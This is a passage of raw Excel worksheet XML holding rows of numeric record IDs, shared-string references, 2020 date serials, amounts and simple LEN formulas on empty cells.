    <row r="1733" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1733">
        <v>17168</v>
      </c>
      <c r="B1733">
        <v>247</v>
      </c>
      <c r="C1733" t="s">
        <v>2451</v>
      </c>
      <c r="D1733" t="s">
        <v>9683</v>
      </c>
      <c r="E1733">
        <v>16</v>
      </c>
      <c r="F1733" t="s">
        <v>673</v>
      </c>
      <c r="G1733" s="1">
        <v>43847</v>
      </c>
      <c r="H1733">
        <v>399000</v>
      </c>
      <c r="K1733">
        <f>LEN(I1733)</f>
        <v>0</v>
      </c>
      <c r="L1733">
        <f>LEN(J1733)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1734" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1734">
        <v>17171</v>
      </c>
      <c r="B1734">
        <v>2267</v>
      </c>
      <c r="C1734" t="s">
        <v>6309</v>
      </c>
      <c r="D1734" t="s">
        <v>9707</v>
      </c>
      <c r="E1734">
        <v>18</v>
      </c>
      <c r="F1734" t="s">
        <v>6917</v>
      </c>
      <c r="G1734" s="1">
        <v>43901</v>
      </c>
      <c r="H1734">
        <v>10000</v>
      </c>
      <c r="K1734">
        <f>LEN(I1734)</f>
        <v>0</v>
      </c>
      <c r="L1734">
        <f>LEN(J1734)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1735" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1735">
        <v>17172</v>
      </c>
      <c r="B1735">
        <v>2267</v>
      </c>
      <c r="C1735" t="s">
        <v>6309</v>
      </c>
      <c r="D1735" t="s">
        <v>9707</v>
      </c>
      <c r="E1735">
        <v>18</v>
      </c>
      <c r="F1735" t="s">
        <v>2236</v>
      </c>
      <c r="G1735" s="1">
        <v>43901</v>
      </c>
      <c r="H1735">
        <v>10000</v>
      </c>
      <c r="K1735">
        <f>LEN(I1735)</f>
        <v>0</v>
      </c>
      <c r="L1735">
        <f>LEN(J1735)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1736" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1736">
        <v>17180</v>
      </c>
      <c r="B1736">
        <v>1598</v>
      </c>
      <c r="C1736" t="s">
        <v>2703</v>
      </c>
      <c r="D1736" t="s">
        <v>9630</v>
      </c>
      <c r="E1736">
        <v>26</v>
      </c>
      <c r="F1736" t="s">
        <v>9645</v>
      </c>
      <c r="G1736" s="1">
        <v>43851</v>
      </c>
      <c r="H1736">
        <v>276000</v>
      </c>
      <c r="K1736">
        <f>LEN(I1736)</f>
        <v>0</v>
      </c>
      <c r="L1736">
        <f>LEN(J1736)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1737" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1737">
        <v>17181</v>
      </c>
      <c r="B1737">
        <v>2308</v>
      </c>
      <c r="C1737" t="s">
        <v>5579</v>
      </c>
      <c r="D1737" t="s">
        <v>9584</v>
      </c>
      <c r="E1737">
        <v>29</v>
      </c>
      <c r="F1737" t="s">
        <v>2236</v>
      </c>
      <c r="G1737" s="1">
        <v>43858</v>
      </c>
      <c r="H1737">
        <v>0</v>
      </c>
      <c r="K1737">
        <f>LEN(I1737)</f>
        <v>0</v>
      </c>
      <c r="L1737">
        <f>LEN(J1737)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1738" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1738">
        <v>17183</v>
      </c>
      <c r="B1738">
        <v>1988</v>
      </c>
      <c r="C1738" t="s">
        <v>4904</v>
      </c>
      <c r="D1738" t="s">
        <v>9717</v>
      </c>
      <c r="E1738">
        <v>16</v>
      </c>
      <c r="F1738" t="s">
        <v>9718</v>
      </c>
      <c r="G1738" s="1">
        <v>43851</v>
      </c>
      <c r="H1738">
        <v>350000</v>
      </c>
      <c r="K1738">
        <f>LEN(I1738)</f>
        <v>0</v>
      </c>
      <c r="L1738">
        <f>LEN(J1738)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1739" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1739">
        <v>17184</v>
      </c>
      <c r="B1739">
        <v>1988</v>
      </c>
      <c r="C1739" t="s">
        <v>4904</v>
      </c>
      <c r="D1739" t="s">
        <v>9717</v>
      </c>
      <c r="E1739">
        <v>16</v>
      </c>
      <c r="F1739" t="s">
        <v>8295</v>
      </c>
      <c r="G1739" s="1">
        <v>43851</v>
      </c>
      <c r="H1739">
        <v>1080000</v>
      </c>
      <c r="K1739">
        <f>LEN(I1739)</f>
        <v>0</v>
      </c>
      <c r="L1739">
        <f>LEN(J1739)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1740" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1740">
        <v>17195</v>
      </c>
      <c r="B1740">
        <v>2309</v>
      </c>
      <c r="C1740" t="s">
        <v>5157</v>
      </c>
      <c r="D1740" t="s">
        <v>9719</v>
      </c>
      <c r="E1740">
        <v>10</v>
      </c>
      <c r="F1740" t="s">
        <v>9720</v>
      </c>
      <c r="G1740" s="1">
        <v>43852</v>
      </c>
      <c r="H1740">
        <v>156000</v>
      </c>
      <c r="K1740">
        <f>LEN(I1740)</f>
        <v>0</v>
      </c>
      <c r="L1740">
        <f>LEN(J1740)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1741" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1741">
        <v>17196</v>
      </c>
      <c r="B1741">
        <v>2309</v>
      </c>
      <c r="C1741" t="s">
        <v>5157</v>
      </c>
      <c r="D1741" t="s">
        <v>9719</v>
      </c>
      <c r="E1741">
        <v>10</v>
      </c>
      <c r="F1741" t="s">
        <v>9721</v>
      </c>
      <c r="G1741" s="1">
        <v>43852</v>
      </c>
      <c r="H1741">
        <v>156000</v>
      </c>
      <c r="K1741">
        <f>LEN(I1741)</f>
        <v>0</v>
      </c>
      <c r="L1741">
        <f>LEN(J1741)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1742" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1742">
        <v>17197</v>
      </c>
      <c r="B1742">
        <v>2309</v>
      </c>
      <c r="C1742" t="s">
        <v>5157</v>
      </c>
      <c r="D1742" t="s">
        <v>9719</v>
      </c>
      <c r="E1742">
        <v>10</v>
      </c>
      <c r="F1742" t="s">
        <v>9595</v>
      </c>
      <c r="G1742" s="1">
        <v>43852</v>
      </c>
      <c r="H1742">
        <v>156000</v>
      </c>
      <c r="K1742">
        <f>LEN(I1742)</f>
        <v>0</v>
      </c>
      <c r="L1742">
        <f>LEN(J1742)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1743" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1743">
        <v>17198</v>
      </c>
      <c r="B1743">
        <v>2309</v>
      </c>
      <c r="C1743" t="s">
        <v>5157</v>
      </c>
      <c r="D1743" t="s">
        <v>9719</v>
      </c>
      <c r="E1743">
        <v>10</v>
      </c>
      <c r="F1743" t="s">
        <v>9722</v>
      </c>
      <c r="G1743" s="1">
        <v>43852</v>
      </c>
      <c r="H1743">
        <v>156000</v>
      </c>
      <c r="K1743">
        <f>LEN(I1743)</f>
        <v>0</v>
      </c>
      <c r="L1743">
        <f>LEN(J1743)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1744" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1744">
        <v>17199</v>
      </c>
      <c r="B1744">
        <v>2309</v>
      </c>
      <c r="C1744" t="s">
        <v>5157</v>
      </c>
      <c r="D1744" t="s">
        <v>9719</v>
      </c>
      <c r="E1744">
        <v>10</v>
      </c>
      <c r="F1744" t="s">
        <v>9645</v>
      </c>
      <c r="G1744" s="1">
        <v>43852</v>
      </c>
      <c r="H1744">
        <v>156000</v>
      </c>
      <c r="K1744">
        <f>LEN(I1744)</f>
        <v>0</v>
      </c>
      <c r="L1744">
        <f>LEN(J1744)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1745" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1745">
        <v>17200</v>
      </c>
      <c r="B1745">
        <v>2309</v>
      </c>
      <c r="C1745" t="s">
        <v>5157</v>
      </c>
      <c r="D1745" t="s">
        <v>9719</v>
      </c>
      <c r="E1745">
        <v>10</v>
      </c>
      <c r="F1745" t="s">
        <v>1746</v>
      </c>
      <c r="G1745" s="1">
        <v>43852</v>
      </c>
      <c r="H1745">
        <v>156000</v>
      </c>
      <c r="K1745">
        <f>LEN(I1745)</f>
        <v>0</v>
      </c>
      <c r="L1745">
        <f>LEN(J1745)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1746" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1746">
        <v>17201</v>
      </c>
      <c r="B1746">
        <v>1130</v>
      </c>
      <c r="C1746" t="s">
        <v>2711</v>
      </c>
      <c r="D1746" t="s">
        <v>9723</v>
      </c>
      <c r="E1746">
        <v>2</v>
      </c>
      <c r="F1746" t="s">
        <v>1746</v>
      </c>
      <c r="G1746" s="1">
        <v>44011</v>
      </c>
      <c r="H1746">
        <v>108000</v>
      </c>
      <c r="K1746">
        <f>LEN(I1746)</f>
        <v>0</v>
      </c>
      <c r="L1746">
        <f>LEN(J1746)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1747" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1747">
        <v>17202</v>
      </c>
      <c r="B1747">
        <v>1130</v>
      </c>
      <c r="C1747" t="s">
        <v>2711</v>
      </c>
      <c r="D1747" t="s">
        <v>9723</v>
      </c>
      <c r="E1747">
        <v>2</v>
      </c>
      <c r="F1747" t="s">
        <v>9435</v>
      </c>
      <c r="G1747" s="1">
        <v>44011</v>
      </c>
      <c r="H1747">
        <v>60000</v>
      </c>
      <c r="K1747">
        <f>LEN(I1747)</f>
        <v>0</v>
      </c>
      <c r="L1747">
        <f>LEN(J1747)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1748" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1748">
        <v>17203</v>
      </c>
      <c r="B1748">
        <v>1130</v>
      </c>
      <c r="C1748" t="s">
        <v>2711</v>
      </c>
      <c r="D1748" t="s">
        <v>9723</v>
      </c>
      <c r="E1748">
        <v>2</v>
      </c>
      <c r="F1748" t="s">
        <v>9724</v>
      </c>
      <c r="G1748" s="1">
        <v>44011</v>
      </c>
      <c r="H1748">
        <v>648000</v>
      </c>
      <c r="K1748">
        <f>LEN(I1748)</f>
        <v>0</v>
      </c>
      <c r="L1748">
        <f>LEN(J1748)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1749" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1749">
        <v>17204</v>
      </c>
      <c r="B1749">
        <v>1130</v>
      </c>
      <c r="C1749" t="s">
        <v>2711</v>
      </c>
      <c r="D1749" t="s">
        <v>9723</v>
      </c>
      <c r="E1749">
        <v>2</v>
      </c>
      <c r="F1749" t="s">
        <v>9725</v>
      </c>
      <c r="G1749" s="1">
        <v>44011</v>
      </c>
      <c r="H1749">
        <v>3888000</v>
      </c>
      <c r="K1749">
        <f>LEN(I1749)</f>
        <v>0</v>
      </c>
      <c r="L1749">
        <f>LEN(J1749)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1750" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1750">
        <v>17205</v>
      </c>
      <c r="B1750">
        <v>1130</v>
      </c>
      <c r="C1750" t="s">
        <v>2711</v>
      </c>
      <c r="D1750" t="s">
        <v>9723</v>
      </c>
      <c r="E1750">
        <v>2</v>
      </c>
      <c r="F1750" t="s">
        <v>9437</v>
      </c>
      <c r="G1750" s="1">
        <v>44011</v>
      </c>
      <c r="H1750">
        <v>1620000</v>
      </c>
      <c r="K1750">
        <f>LEN(I1750)</f>
        <v>0</v>
      </c>
      <c r="L1750">
        <f>LEN(J1750)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1751" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1751">
        <v>17206</v>
      </c>
      <c r="B1751">
        <v>1721</v>
      </c>
      <c r="C1751" t="s">
        <v>6722</v>
      </c>
      <c r="D1751" t="s">
        <v>9726</v>
      </c>
      <c r="E1751">
        <v>14</v>
      </c>
      <c r="F1751" t="s">
        <v>6635</v>
      </c>
      <c r="G1751" s="1">
        <v>43853</v>
      </c>
      <c r="H1751">
        <v>1000000</v>
      </c>
      <c r="K1751">
        <f>LEN(I1751)</f>
        <v>0</v>
      </c>
      <c r="L1751">
        <f>LEN(J1751)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1752" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1752">
        <v>17207</v>
      </c>
      <c r="B1752">
        <v>2239</v>
      </c>
      <c r="C1752" t="s">
        <v>6191</v>
      </c>
      <c r="D1752" t="s">
        <v>9727</v>
      </c>
      <c r="E1752">
        <v>29</v>
      </c>
      <c r="F1752" t="s">
        <v>9728</v>
      </c>
      <c r="G1752" s="1">
        <v>43865</v>
      </c>
      <c r="H1752">
        <v>1600</v>
      </c>
      <c r="K1752">
        <f>LEN(I1752)</f>
        <v>0</v>
      </c>
      <c r="L1752">
        <f>LEN(J1752)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1753" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1753">
        <v>17209</v>
      </c>
      <c r="B1753">
        <v>2239</v>
      </c>
      <c r="C1753" t="s">
        <v>6191</v>
      </c>
      <c r="D1753" t="s">
        <v>9730</v>
      </c>
      <c r="E1753">
        <v>29</v>
      </c>
      <c r="F1753" t="s">
        <v>1455</v>
      </c>
      <c r="G1753" s="1">
        <v>43865</v>
      </c>
      <c r="H1753">
        <v>162000</v>
      </c>
      <c r="K1753">
        <f>LEN(I1753)</f>
        <v>0</v>
      </c>
      <c r="L1753">
        <f>LEN(J1753)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1754" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1754">
        <v>17210</v>
      </c>
      <c r="B1754">
        <v>2239</v>
      </c>
      <c r="C1754" t="s">
        <v>6191</v>
      </c>
      <c r="D1754" t="s">
        <v>9727</v>
      </c>
      <c r="E1754">
        <v>29</v>
      </c>
      <c r="F1754" t="s">
        <v>4062</v>
      </c>
      <c r="G1754" s="1">
        <v>43865</v>
      </c>
      <c r="H1754">
        <v>482000</v>
      </c>
      <c r="K1754">
        <f>LEN(I1754)</f>
        <v>0</v>
      </c>
      <c r="L1754">
        <f>LEN(J1754)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1755" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1755">
        <v>17211</v>
      </c>
      <c r="B1755">
        <v>28</v>
      </c>
      <c r="C1755" t="s">
        <v>2364</v>
      </c>
      <c r="D1755" t="s">
        <v>9731</v>
      </c>
      <c r="E1755">
        <v>17</v>
      </c>
      <c r="F1755" t="s">
        <v>9645</v>
      </c>
      <c r="G1755" s="1">
        <v>43843</v>
      </c>
      <c r="H1755">
        <v>2000</v>
      </c>
      <c r="K1755">
        <f>LEN(I1755)</f>
        <v>0</v>
      </c>
      <c r="L1755">
        <f>LEN(J1755)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1756" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1756">
        <v>17212</v>
      </c>
      <c r="B1756">
        <v>28</v>
      </c>
      <c r="C1756" t="s">
        <v>2364</v>
      </c>
      <c r="D1756" t="s">
        <v>9731</v>
      </c>
      <c r="E1756">
        <v>17</v>
      </c>
      <c r="F1756" t="s">
        <v>9582</v>
      </c>
      <c r="G1756" s="1">
        <v>43843</v>
      </c>
      <c r="H1756">
        <v>2000</v>
      </c>
      <c r="K1756">
        <f>LEN(I1756)</f>
        <v>0</v>
      </c>
      <c r="L1756">
        <f>LEN(J1756)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1757" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1757">
        <v>17213</v>
      </c>
      <c r="B1757">
        <v>28</v>
      </c>
      <c r="C1757" t="s">
        <v>2364</v>
      </c>
      <c r="D1757" t="s">
        <v>9731</v>
      </c>
      <c r="E1757">
        <v>17</v>
      </c>
      <c r="F1757" t="s">
        <v>9732</v>
      </c>
      <c r="G1757" s="1">
        <v>43843</v>
      </c>
      <c r="H1757">
        <v>2000</v>
      </c>
      <c r="K1757">
        <f>LEN(I1757)</f>
        <v>0</v>
      </c>
      <c r="L1757">
        <f>LEN(J1757)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1758" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1758">
        <v>17214</v>
      </c>
      <c r="B1758">
        <v>28</v>
      </c>
      <c r="C1758" t="s">
        <v>2364</v>
      </c>
      <c r="D1758" t="s">
        <v>9731</v>
      </c>
      <c r="E1758">
        <v>17</v>
      </c>
      <c r="F1758" t="s">
        <v>9733</v>
      </c>
      <c r="G1758" s="1">
        <v>43843</v>
      </c>
      <c r="H1758">
        <v>2000</v>
      </c>
      <c r="K1758">
        <f>LEN(I1758)</f>
        <v>0</v>
      </c>
      <c r="L1758">
        <f>LEN(J1758)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1759" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1759">
        <v>17215</v>
      </c>
      <c r="B1759">
        <v>28</v>
      </c>
      <c r="C1759" t="s">
        <v>2364</v>
      </c>
      <c r="D1759" t="s">
        <v>9731</v>
      </c>
      <c r="E1759">
        <v>17</v>
      </c>
      <c r="F1759" t="s">
        <v>9734</v>
      </c>
      <c r="G1759" s="1">
        <v>43843</v>
      </c>
      <c r="H1759">
        <v>3000</v>
      </c>
      <c r="K1759">
        <f>LEN(I1759)</f>
        <v>0</v>
      </c>
      <c r="L1759">
        <f>LEN(J1759)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1760" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1760">
        <v>17216</v>
      </c>
      <c r="B1760">
        <v>28</v>
      </c>
      <c r="C1760" t="s">
        <v>2364</v>
      </c>
      <c r="D1760" t="s">
        <v>9731</v>
      </c>
      <c r="E1760">
        <v>17</v>
      </c>
      <c r="F1760" t="s">
        <v>4686</v>
      </c>
      <c r="G1760" s="1">
        <v>43843</v>
      </c>
      <c r="H1760">
        <v>20000</v>
      </c>
      <c r="K1760">
        <f>LEN(I1760)</f>
        <v>0</v>
      </c>
      <c r="L1760">
        <f>LEN(J1760)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1761" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1761">
        <v>17217</v>
      </c>
      <c r="B1761">
        <v>28</v>
      </c>
      <c r="C1761" t="s">
        <v>2364</v>
      </c>
      <c r="D1761" t="s">
        <v>9731</v>
      </c>
      <c r="E1761">
        <v>17</v>
      </c>
      <c r="F1761" t="s">
        <v>2236</v>
      </c>
      <c r="G1761" s="1">
        <v>43843</v>
      </c>
      <c r="H1761">
        <v>50000</v>
      </c>
      <c r="K1761">
        <f>LEN(I1761)</f>
        <v>0</v>
      </c>
      <c r="L1761">
        <f>LEN(J1761)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1762" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1762">
        <v>17222</v>
      </c>
      <c r="B1762">
        <v>2276</v>
      </c>
      <c r="C1762" t="s">
        <v>5862</v>
      </c>
      <c r="D1762" t="s">
        <v>9735</v>
      </c>
      <c r="E1762">
        <v>11</v>
      </c>
      <c r="F1762" t="s">
        <v>3318</v>
      </c>
      <c r="G1762" s="1">
        <v>43914</v>
      </c>
      <c r="H1762">
        <v>40000</v>
      </c>
      <c r="K1762">
        <f>LEN(I1762)</f>
        <v>0</v>
      </c>
      <c r="L1762">
        <f>LEN(J1762)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1763" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1763">
        <v>17223</v>
      </c>
      <c r="B1763">
        <v>2192</v>
      </c>
      <c r="C1763" t="s">
        <v>6768</v>
      </c>
      <c r="D1763" t="s">
        <v>9736</v>
      </c>
      <c r="E1763">
        <v>14</v>
      </c>
      <c r="F1763" t="s">
        <v>3076</v>
      </c>
      <c r="G1763" s="1">
        <v>44041</v>
      </c>
      <c r="H1763">
        <v>15000000</v>
      </c>
      <c r="K1763">
        <f>LEN(I1763)</f>
        <v>0</v>
      </c>
      <c r="L1763">
        <f>LEN(J1763)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1764" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1764">
        <v>17228</v>
      </c>
      <c r="B1764">
        <v>2306</v>
      </c>
      <c r="C1764" t="s">
        <v>6827</v>
      </c>
      <c r="D1764" t="s">
        <v>9737</v>
      </c>
      <c r="E1764">
        <v>16</v>
      </c>
      <c r="F1764" t="s">
        <v>9586</v>
      </c>
      <c r="G1764" s="1">
        <v>43857</v>
      </c>
      <c r="H1764">
        <v>100000</v>
      </c>
      <c r="K1764">
        <f>LEN(I1764)</f>
        <v>0</v>
      </c>
      <c r="L1764">
        <f>LEN(J1764)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1765" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1765">
        <v>17241</v>
      </c>
      <c r="B1765">
        <v>259</v>
      </c>
      <c r="C1765" t="s">
        <v>1267</v>
      </c>
      <c r="D1765" t="s">
        <v>9568</v>
      </c>
      <c r="E1765">
        <v>16</v>
      </c>
      <c r="F1765" t="s">
        <v>9437</v>
      </c>
      <c r="G1765" s="1">
        <v>43963</v>
      </c>
      <c r="H1765">
        <v>7285</v>
      </c>
      <c r="K1765">
        <f>LEN(I1765)</f>
        <v>0</v>
      </c>
      <c r="L1765">
        <f>LEN(J1765)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1766" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1766">
        <v>17242</v>
      </c>
      <c r="B1766">
        <v>259</v>
      </c>
      <c r="C1766" t="s">
        <v>1267</v>
      </c>
      <c r="D1766" t="s">
        <v>9568</v>
      </c>
      <c r="E1766">
        <v>16</v>
      </c>
      <c r="F1766" t="s">
        <v>9741</v>
      </c>
      <c r="G1766" s="1">
        <v>43963</v>
      </c>
      <c r="H1766">
        <v>77550</v>
      </c>
      <c r="K1766">
        <f>LEN(I1766)</f>
        <v>0</v>
      </c>
      <c r="L1766">
        <f>LEN(J1766)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1767" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1767">
        <v>17243</v>
      </c>
      <c r="B1767">
        <v>259</v>
      </c>
      <c r="C1767" t="s">
        <v>1267</v>
      </c>
      <c r="D1767" t="s">
        <v>9568</v>
      </c>
      <c r="E1767">
        <v>16</v>
      </c>
      <c r="F1767" t="s">
        <v>9742</v>
      </c>
      <c r="G1767" s="1">
        <v>43963</v>
      </c>
      <c r="H1767">
        <v>26980</v>
      </c>
      <c r="K1767">
        <f>LEN(I1767)</f>
        <v>0</v>
      </c>
      <c r="L1767">
        <f>LEN(J1767)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1768" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1768">
        <v>17244</v>
      </c>
      <c r="B1768">
        <v>2241</v>
      </c>
      <c r="C1768" t="s">
        <v>5775</v>
      </c>
      <c r="D1768" t="s">
        <v>9743</v>
      </c>
      <c r="E1768">
        <v>16</v>
      </c>
      <c r="F1768" t="s">
        <v>7241</v>
      </c>
      <c r="G1768" s="1">
        <v>43907</v>
      </c>
      <c r="H1768">
        <v>50000</v>
      </c>
      <c r="K1768">
        <f>LEN(I1768)</f>
        <v>0</v>
      </c>
      <c r="L1768">
        <f>LEN(J1768)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1769" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1769">
        <v>17269</v>
      </c>
      <c r="B1769">
        <v>2287</v>
      </c>
      <c r="C1769" t="s">
        <v>4731</v>
      </c>
      <c r="D1769" t="s">
        <v>9753</v>
      </c>
      <c r="E1769">
        <v>15</v>
      </c>
      <c r="F1769" t="s">
        <v>7114</v>
      </c>
      <c r="G1769" s="1">
        <v>44061</v>
      </c>
      <c r="H1769">
        <v>604800</v>
      </c>
      <c r="K1769">
        <f>LEN(I1769)</f>
        <v>0</v>
      </c>
      <c r="L1769">
        <f>LEN(J1769)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1770" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1770">
        <v>17270</v>
      </c>
      <c r="B1770">
        <v>2287</v>
      </c>
      <c r="C1770" t="s">
        <v>4731</v>
      </c>
      <c r="D1770" t="s">
        <v>9753</v>
      </c>
      <c r="E1770">
        <v>15</v>
      </c>
      <c r="F1770" t="s">
        <v>8230</v>
      </c>
      <c r="G1770" s="1">
        <v>44061</v>
      </c>
      <c r="H1770">
        <v>259200</v>
      </c>
      <c r="K1770">
        <f>LEN(I1770)</f>
        <v>0</v>
      </c>
      <c r="L1770">
        <f>LEN(J1770)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1771" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1771">
        <v>17294</v>
      </c>
      <c r="B1771">
        <v>1028</v>
      </c>
      <c r="C1771" t="s">
        <v>2780</v>
      </c>
      <c r="D1771" t="s">
        <v>9760</v>
      </c>
      <c r="E1771">
        <v>16</v>
      </c>
      <c r="F1771" t="s">
        <v>9681</v>
      </c>
      <c r="G1771" s="1">
        <v>43864</v>
      </c>
      <c r="H1771">
        <v>10000</v>
      </c>
      <c r="K1771">
        <f>LEN(I1771)</f>
        <v>0</v>
      </c>
      <c r="L1771">
        <f>LEN(J1771)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1772" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1772">
        <v>17296</v>
      </c>
      <c r="B1772">
        <v>958</v>
      </c>
      <c r="C1772" t="s">
        <v>16395</v>
      </c>
      <c r="D1772" t="s">
        <v>16396</v>
      </c>
      <c r="E1772">
        <v>16</v>
      </c>
      <c r="F1772" t="s">
        <v>9595</v>
      </c>
      <c r="G1772" s="1">
        <v>43847</v>
      </c>
      <c r="H1772">
        <v>327845.23</v>
      </c>
      <c r="K1772">
        <f>LEN(I1772)</f>
        <v>0</v>
      </c>
      <c r="L1772">
        <f>LEN(J1772)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1773" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1773">
        <v>17298</v>
      </c>
      <c r="B1773">
        <v>2293</v>
      </c>
      <c r="C1773" t="s">
        <v>5151</v>
      </c>
      <c r="D1773" t="s">
        <v>9762</v>
      </c>
      <c r="E1773">
        <v>26</v>
      </c>
      <c r="F1773" t="s">
        <v>9497</v>
      </c>
      <c r="G1773" s="1">
        <v>43860</v>
      </c>
      <c r="H1773">
        <v>120000</v>
      </c>
      <c r="K1773">
        <f>LEN(I1773)</f>
        <v>0</v>
      </c>
      <c r="L1773">
        <f>LEN(J1773)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1774" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1774">
        <v>17299</v>
      </c>
      <c r="B1774">
        <v>2293</v>
      </c>
      <c r="C1774" t="s">
        <v>5151</v>
      </c>
      <c r="D1774" t="s">
        <v>9762</v>
      </c>
      <c r="E1774">
        <v>26</v>
      </c>
      <c r="F1774" t="s">
        <v>3499</v>
      </c>
      <c r="G1774" s="1">
        <v>43860</v>
      </c>
      <c r="H1774">
        <v>60000</v>
      </c>
      <c r="K1774">
        <f>LEN(I1774)</f>
        <v>0</v>
      </c>
      <c r="L1774">
        <f>LEN(J1774)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1775" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1775">
        <v>17301</v>
      </c>
      <c r="B1775">
        <v>2142</v>
      </c>
      <c r="C1775" t="s">
        <v>4977</v>
      </c>
      <c r="D1775" t="s">
        <v>9763</v>
      </c>
      <c r="E1775">
        <v>11</v>
      </c>
      <c r="F1775" t="s">
        <v>9765</v>
      </c>
      <c r="G1775" s="1">
        <v>43853</v>
      </c>
      <c r="H1775">
        <v>15000</v>
      </c>
      <c r="K1775">
        <f>LEN(I1775)</f>
        <v>0</v>
      </c>
      <c r="L1775">
        <f>LEN(J1775)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1776" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1776">
        <v>17306</v>
      </c>
      <c r="B1776">
        <v>2142</v>
      </c>
      <c r="C1776" t="s">
        <v>4977</v>
      </c>
      <c r="D1776" t="s">
        <v>9763</v>
      </c>
      <c r="E1776">
        <v>11</v>
      </c>
      <c r="F1776" t="s">
        <v>9767</v>
      </c>
      <c r="G1776" s="1">
        <v>43853</v>
      </c>
      <c r="H1776">
        <v>15000</v>
      </c>
      <c r="K1776">
        <f>LEN(I1776)</f>
        <v>0</v>
      </c>
      <c r="L1776">
        <f>LEN(J1776)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1777" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1777">
        <v>17307</v>
      </c>
      <c r="B1777">
        <v>2142</v>
      </c>
      <c r="C1777" t="s">
        <v>4977</v>
      </c>
      <c r="D1777" t="s">
        <v>9763</v>
      </c>
      <c r="E1777">
        <v>11</v>
      </c>
      <c r="F1777" t="s">
        <v>9438</v>
      </c>
      <c r="G1777" s="1">
        <v>43853</v>
      </c>
      <c r="H1777">
        <v>50000</v>
      </c>
      <c r="K1777">
        <f>LEN(I1777)</f>
        <v>0</v>
      </c>
      <c r="L1777">
        <f>LEN(J1777)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1778" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1778">
        <v>17308</v>
      </c>
      <c r="B1778">
        <v>2142</v>
      </c>
      <c r="C1778" t="s">
        <v>4977</v>
      </c>
